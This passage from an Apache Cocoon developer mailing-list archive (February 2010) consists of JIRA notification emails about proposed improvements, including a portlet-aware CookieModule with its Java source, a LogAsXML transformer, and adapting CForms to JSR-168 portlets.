=C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2= =A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 Managing Director, {Indoqa} GmbH > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2= =A0 =C2=A0 http://www.indoqa.com/en/people/reinhard.poetz/ > > Member of the Apache Software Foundation > Apache Cocoon Committer, PMC member =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 = =C2=A0 =C2=A0 =C2=A0 [email protected] > ________________________________________________________________________ > From [email protected] Sat Feb 20 14:54:53 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71596 invoked from network); 20 Feb 2010 14:54:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2010 14:54:53 -0000 Received: (qmail 94002 invoked by uid 500); 20 Feb 2010 14:54:53 -0000 Delivered-To: [email protected] Received: (qmail 93906 invoked by uid 500); 20 Feb 2010 14:54:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 93898 invoked by uid 99); 20 Feb 2010 14:54:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 14:54:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 14:54:49 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6E1E029A001E for <[email protected]>; Sat, 20 Feb 2010 06:54:28 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 20 Feb 2010 14:54:28 +0000 (UTC) From: "Francesco Chicchiricco (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (COCOON-2282) JSR-168 Portlet preferences input module MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org JSR-168 Portlet preferences input module ---------------------------------------- Key: COCOON-2282 URL: https://issues.apache.org/jira/browse/COCOON-2282 Project: Cocoon Issue Type: Improvement Components: Blocks: Portal Affects Versions: 2.1.11 Reporter: Francesco Chicchiricco A sitemap input module for fetching PortletPreferences as they were cookies. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Feb 20 14:56:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72450 invoked from network); 20 Feb 2010 14:56:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2010 14:56:51 -0000 Received: (qmail 97112 invoked by uid 500); 20 Feb 2010 14:56:51 -0000 Delivered-To: [email protected] Received: (qmail 96998 invoked by uid 500); 20 Feb 2010 14:56:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 96990 invoked by uid 99); 20 Feb 2010 14:56:50 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 14:56:50 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 14:56:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E9D5A29A0023 for <[email protected]>; Sat, 20 Feb 2010 06:56:27 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 20 Feb 2010 14:56:27 +0000 (UTC) From: "Francesco Chicchiricco (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON-2282) JSR-168 Portlet preferences input module In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/COCOON-2282?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Francesco Chicchiricco updated COCOON-2282: ------------------------------------------- Attachment: PortletPreferencesModule.java > JSR-168 Portlet preferences input module > ---------------------------------------- > > Key: COCOON-2282 > URL: https://issues.apache.org/jira/browse/COCOON-2282 > Project: Cocoon > Issue Type: Improvement > Components: Blocks: Portal > Affects Versions: 2.1.11 > Reporter: Francesco Chicchiricco > Attachments: PortletPreferencesModule.java > > > A sitemap input module for fetching PortletPreferences as they were cookies. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Feb 20 14:58:57 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73494 invoked from network); 20 Feb 2010 14:58:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2010 14:58:57 -0000 Received: (qmail 99839 invoked by uid 500); 20 Feb 2010 14:58:56 -0000 Delivered-To: [email protected] Received: (qmail 99743 invoked by uid 500); 20 Feb 2010 14:58:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 99735 invoked by uid 99); 20 Feb 2010 14:58:56 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 14:58:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 14:58:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 189AC29A002F for <[email protected]>; Sat, 20 Feb 2010 06:58:28 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 20 Feb 2010 14:58:28 +0000 (UTC) From: "Francesco Chicchiricco (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON-2072) JSR.168 Portlet-aware CookieModule In-Reply-To: <25705197.1180619775631.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/COCOON-2072?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Francesco Chicchiricco updated COCOON-2072: ------------------------------------------- Description: A FAQ here: http://wiki.java.net/bin/view/Portlet/JSR168FAQ#Is_there_a_hack_to_get_set_cooki says that some JSR-168 containers provide their javax.portlet.PortletRequest implementation with cookies, even thought embedded in a string. Looking at sources of Jakarta Pluto (org.apache.pluto.internal.impl.PortletRequestImpl) and Sun's Open Portal - free version of Sun JES Portal Server - (com.sun.portal.portlet.impl.PortletRequestImpl), I found that this is true for both. See attached a simple org.apache.cocoon.components.modules.input.CookieModule extension that can handle all that above, providing cookie access to portlets. was: A FAQ here: http://wiki.java.net/bin/view/Portlet/JSR168FAQ#Is_there_a_hack_to_get_set_cooki says that some JSR-168 containers provide their javax.portlet.PortletRequest implementation with cookies, even thought embedded in a string. Looking at sources of Jakarta Pluto (org.apache.pluto.internal.impl.PortletRequestImpl) and Sun's Open Portal - free version of Sun JES Portal Server - (com.sun.portal.portlet.impl.PortletRequestImpl), I found that this is true for both. So, I wrote a simple org.apache.cocoon.components.modules.input.CookieModule extension that can handle all that above, providing cookie access to portlets: Here's the code: public class PortletAwareCookieModule extends CookieModule { final protected String COOKIE = "cookie"; @Override protected Map getCookieMap(Map objectModel) { if (!objectModel.containsKey(PortletObjectModelHelper.PORTLET_REQUEST_OBJECT)) return super.getCookieMap(objectModel); PortletRequest portletRequest = PortletObjectModelHelper.getPortletRequest(objectModel); String cookieList = portletRequest.getProperty(COOKIE); StringTokenizer cookieTok = new StringTokenizer(cookieList, ";"); String[] cookieParts = null; Map<String, HttpCookie> cookieMap = new HashMap<String, HttpCookie>(); while (cookieTok.hasMoreTokens()) { cookieParts = cookieTok.nextToken() .trim() .split("="); cookieMap.put(cookieParts[0], new HttpCookie(cookieParts[0], cookieParts[1])); } return cookieMap; } } Affects Version/s: 2.1.11 > JSR.168 Portlet-aware CookieModule > ---------------------------------- > > Key: COCOON-2072 > URL: https://issues.apache.org/jira/browse/COCOON-2072 > Project: Cocoon > Issue Type: Improvement > Components: Blocks: Portal > Affects Versions: 2.1.11 > Reporter: Francesco Chicchiricco > Attachments: PortletAwareCookieModule.java > > > A FAQ here: http://wiki.java.net/bin/view/Portlet/JSR168FAQ#Is_there_a_hack_to_get_set_cooki says that some JSR-168 containers provide their javax.portlet.PortletRequest implementation with cookies, even thought embedded in a string. > Looking at sources of Jakarta Pluto (org.apache.pluto.internal.impl.PortletRequestImpl) and Sun's Open Portal - free version of Sun JES Portal Server - (com.sun.portal.portlet.impl.PortletRequestImpl), I found that this is true for both. > See attached a simple org.apache.cocoon.components.modules.input.CookieModule extension that can handle all that above, providing cookie access to portlets. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Feb 20 14:58:59 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73682 invoked from network); 20 Feb 2010 14:58:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2010 14:58:59 -0000 Received: (qmail 389 invoked by uid 500); 20 Feb 2010 14:58:58 -0000 Delivered-To: [email protected] Received: (qmail 304 invoked by uid 500); 20 Feb 2010 14:58:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 296 invoked by uid 99); 20 Feb 2010 14:58:58 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 14:58:58 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 14:58:49 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 017CA29A0026 for <[email protected]>; Sat, 20 Feb 2010 06:58:28 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 20 Feb 2010 14:58:28 +0000 (UTC) From: "Francesco Chicchiricco (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON-2072) JSR.168 Portlet-aware CookieModule In-Reply-To: <25705197.1180619775631.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/COCOON-2072?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Francesco Chicchiricco updated COCOON-2072: ------------------------------------------- Attachment: PortletAwareCookieModule.java > JSR.168 Portlet-aware CookieModule > ---------------------------------- > > Key: COCOON-2072 > URL: https://issues.apache.org/jira/browse/COCOON-2072 > Project: Cocoon > Issue Type: Improvement > Components: Blocks: Portal > Affects Versions: 2.1.11 > Reporter: Francesco Chicchiricco > Attachments: PortletAwareCookieModule.java > > > A FAQ here: http://wiki.java.net/bin/view/Portlet/JSR168FAQ#Is_there_a_hack_to_get_set_cooki says that some JSR-168 containers provide their javax.portlet.PortletRequest implementation with cookies, even thought embedded in a string. > Looking at sources of Jakarta Pluto (org.apache.pluto.internal.impl.PortletRequestImpl) and Sun's Open Portal - free version of Sun JES Portal Server - (com.sun.portal.portlet.impl.PortletRequestImpl), I found that this is true for both. > So, I wrote a simple org.apache.cocoon.components.modules.input.CookieModule extension that can handle all that above, providing cookie access to portlets: > Here's the code: > public class PortletAwareCookieModule extends CookieModule { > final protected String COOKIE = "cookie"; > @Override > protected Map getCookieMap(Map objectModel) { > if (!objectModel.containsKey(PortletObjectModelHelper.PORTLET_REQUEST_OBJECT)) > return super.getCookieMap(objectModel); > PortletRequest portletRequest = > PortletObjectModelHelper.getPortletRequest(objectModel); > String cookieList = portletRequest.getProperty(COOKIE); > StringTokenizer cookieTok = new StringTokenizer(cookieList, > ";"); > String[] cookieParts = null; > Map<String, HttpCookie> cookieMap = new HashMap<String, HttpCookie>(); > while (cookieTok.hasMoreTokens()) { > cookieParts = cookieTok.nextToken() > .trim() > .split("="); > cookieMap.put(cookieParts[0], > new HttpCookie(cookieParts[0], > cookieParts[1])); > } > return cookieMap; > } > } -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Feb 20 15:00:52 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74797 invoked from network); 20 Feb 2010 15:00:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2010 15:00:52 -0000 Received: (qmail 2525 invoked by uid 500); 20 Feb 2010 15:00:51 -0000 Delivered-To: [email protected] Received: (qmail 2411 invoked by uid 500); 20 Feb 2010 15:00:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 2403 invoked by uid 99); 20 Feb 2010 15:00:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:00:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:00:49 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 17BDC29A0029 for <[email protected]>; Sat, 20 Feb 2010 07:00:28 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 20 Feb 2010 15:00:28 +0000 (UTC) From: =?utf-8?Q?Francesco_Chicchiricc=C3=B2_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Created: (COCOON-2283) LogASXML transformer, an improvement of LogTransformer MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org LogASXML transformer, an improvement of LogTransformer ------------------------------------------------------ Key: COCOON-2283 URL: https://issues.apache.org/jira/browse/COCOON-2283 Project: Cocoon Issue Type: Improvement Components: * Cocoon Core Affects Versions: 2.1.11 Reporter: Francesco Chicchiricc=C3=B2 Attachments: LogAsXMLTransformer.java The LogAsXMLTransformer is a class that can be plugged into a pipeline to p= rint the SAX events which passes through this transformer as XML to a file. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Feb 20 15:00:53 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74914 invoked from network); 20 Feb 2010 15:00:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2010 15:00:52 -0000 Received: (qmail 2837 invoked by uid 500); 20 Feb 2010 15:00:51 -0000 Delivered-To: [email protected] Received: (qmail 2723 invoked by uid 500); 20 Feb 2010 15:00:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 2505 invoked by uid 99); 20 Feb 2010 15:00:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:00:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:00:49 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1F24B29A002F for <[email protected]>; Sat, 20 Feb 2010 07:00:28 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 20 Feb 2010 15:00:28 +0000 (UTC) From: =?utf-8?Q?Francesco_Chicchiricc=C3=B2_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON-2283) LogASXML transformer, an improvement of LogTransformer In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/COCOON-2283?page=3Dcom.atlassi= an.jira.plugin.system.issuetabpanels:all-tabpanel ] Francesco Chicchiricc=C3=B2 updated COCOON-2283: ------------------------------------------- Attachment: LogAsXMLTransformer.java > LogASXML transformer, an improvement of LogTransformer > ------------------------------------------------------ > > Key: COCOON-2283 > URL: https://issues.apache.org/jira/browse/COCOON-2283 > Project: Cocoon > Issue Type: Improvement > Components: * Cocoon Core > Affects Versions: 2.1.11 > Reporter: Francesco Chicchiricc=C3=B2 > Attachments: LogAsXMLTransformer.java > > > The LogAsXMLTransformer is a class that can be plugged into a pipeline to= print the SAX events which passes through this transformer as XML to a fil= e. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Feb 20 15:02:57 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76134 invoked from network); 20 Feb 2010 15:02:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2010 15:02:57 -0000 Received: (qmail 10565 invoked by uid 500); 20 Feb 2010 15:02:56 -0000 Delivered-To: [email protected] Received: (qmail 10450 invoked by uid 500); 20 Feb 2010 15:02:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 10442 invoked by uid 99); 20 Feb 2010 15:02:56 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:02:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:02:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id DC91B29A002F for <[email protected]>; Sat, 20 Feb 2010 07:02:27 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 20 Feb 2010 15:02:27 +0000 (UTC) From: =?utf-8?Q?Francesco_Chicchiricc=C3=B2_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON-2072) JSR-168 Portlet-aware CookieModule In-Reply-To: <25705197.1180619775631.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/COCOON-2072?page=3Dcom.atlassi= an.jira.plugin.system.issuetabpanels:all-tabpanel ] Francesco Chicchiricc=C3=B2 updated COCOON-2072: ------------------------------------------- Summary: JSR-168 Portlet-aware CookieModule (was: JSR.168 Portlet-awar= e CookieModule) > JSR-168 Portlet-aware CookieModule > ---------------------------------- > > Key: COCOON-2072 > URL: https://issues.apache.org/jira/browse/COCOON-2072 > Project: Cocoon > Issue Type: Improvement > Components: Blocks: Portal > Affects Versions: 2.1.11 > Reporter: Francesco Chicchiricc=C3=B2 > Attachments: PortletAwareCookieModule.java > > > A FAQ here: http://wiki.java.net/bin/view/Portlet/JSR168FAQ#Is_there_a_ha= ck_to_get_set_cooki says that some JSR-168 containers provide their javax.p= ortlet.PortletRequest implementation with cookies, even thought embedded in= a string. > Looking at sources of Jakarta Pluto (org.apache.pluto.internal.impl.Portl= etRequestImpl) and Sun's Open Portal - free version of Sun JES Portal Serve= r - (com.sun.portal.portlet.impl.PortletRequestImpl), I found that this is = true for both. > See attached a simple org.apache.cocoon.components.modules.input.CookieMo= dule extension that can handle all that above, providing cookie access to p= ortlets. --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Feb 20 15:13:00 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82574 invoked from network); 20 Feb 2010 15:12:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2010 15:12:59 -0000 Received: (qmail 19472 invoked by uid 500); 20 Feb 2010 15:12:59 -0000 Delivered-To: [email protected] Received: (qmail 19378 invoked by uid 500); 20 Feb 2010 15:12:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 19370 invoked by uid 99); 20 Feb 2010 15:12:58 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:12:58 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:12:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id DBDC729A002F for <[email protected]>; Sat, 20 Feb 2010 07:12:27 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 20 Feb 2010 15:12:27 +0000 (UTC) From: =?utf-8?Q?Francesco_Chicchiricc=C3=B2_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Created: (COCOON-2284) Making CForms working in JSR-168 portlets MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Making CForms working in JSR-168 portlets ----------------------------------------- Key: COCOON-2284 URL: https://issues.apache.org/jira/browse/COCOON-2284 Project: Cocoon Issue Type: Improvement Components: Blocks: Forms, Blocks: Portal Affects Versions: 2.1.11 Reporter: Francesco Chicchiricc=C3=B2 I started from the wiki page at [1]: rather good, even though quite bound t= o pluto 1.0. I could easily adapt the procedure to Open Portlet Container [= 2] and Sun Portal Server; unfortunately, when it comes to CForms, the only = pointer is [3], very out of date nowadays. The main issue in CForms is related to the fact that also [2] points out: P= ortlet's ActionRequest can not have any response body. After some strugglin= g, I found the solution by modifying Form.js' sendFormAndWait() to be able = to cope with the former issue. Another smaller issue is related to resources URI (for CSS and JS) that mus= t be adapted and rewritten by the LinkRewriter in order to be effective. [1] http://wiki.apache.org/cocoon/CocoonAppAsJSR168Portlet [2] https://portlet-container.dev.java.net/ [3] http://blog.reverycodes.com/archives/000018.html --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Feb 20 15:14:59 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83437 invoked from network); 20 Feb 2010 15:14:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2010 15:14:59 -0000 Received: (qmail 27164 invoked by uid 500); 20 Feb 2010 15:14:58 -0000 Delivered-To: [email protected] Received: (qmail 27067 invoked by uid 500); 20 Feb 2010 15:14:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 27059 invoked by uid 99); 20 Feb 2010 15:14:58 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:14:58 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:14:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D4F4D29A002F for <[email protected]>; Sat, 20 Feb 2010 07:14:27 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 20 Feb 2010 15:14:27 +0000 (UTC) From: =?utf-8?Q?Francesco_Chicchiricc=C3=B2_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON-2284) Making CForms working in JSR-168 portlets In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/COCOON-2284?page=3Dcom.atlassi= an.jira.plugin.system.issuetabpanels:all-tabpanel ] Francesco Chicchiricc=C3=B2 updated COCOON-2284: ------------------------------------------- Attachment: Form.js Form.js extension able to deal with JSR-168 portlets. > Making CForms working in JSR-168 portlets > ----------------------------------------- > > Key: COCOON-2284 > URL: https://issues.apache.org/jira/browse/COCOON-2284 > Project: Cocoon > Issue Type: Improvement > Components: Blocks: Forms, Blocks: Portal > Affects Versions: 2.1.11 > Reporter: Francesco Chicchiricc=C3=B2 > Attachments: Form.js > > > I started from the wiki page at [1]: rather good, even though quite bound= to pluto 1.0. I could easily adapt the procedure to Open Portlet Container= [2] and Sun Portal Server; unfortunately, when it comes to CForms, the onl= y pointer is [3], very out of date nowadays. > The main issue in CForms is related to the fact that also [2] points out:= Portlet's ActionRequest can not have any response body. After some struggl= ing, I found the solution by modifying Form.js' sendFormAndWait() to be abl= e to cope with the former issue. > Another smaller issue is related to resources URI (for CSS and JS) that m= ust be adapted and rewritten by the LinkRewriter in order to be effective. > [1] http://wiki.apache.org/cocoon/CocoonAppAsJSR168Portlet > [2] https://portlet-container.dev.java.net/ > [3] http://blog.reverycodes.com/archives/000018.html --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Feb 20 15:16:59 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84191 invoked from network); 20 Feb 2010 15:16:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Feb 2010 15:16:59 -0000 Received: (qmail 32277 invoked by uid 500); 20 Feb 2010 15:16:59 -0000 Delivered-To: [email protected] Received: (qmail 32182 invoked by uid 500); 20 Feb 2010 15:16:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 32174 invoked by uid 99); 20 Feb 2010 15:16:58 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:16:58 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Feb 2010 15:16:48 +0000 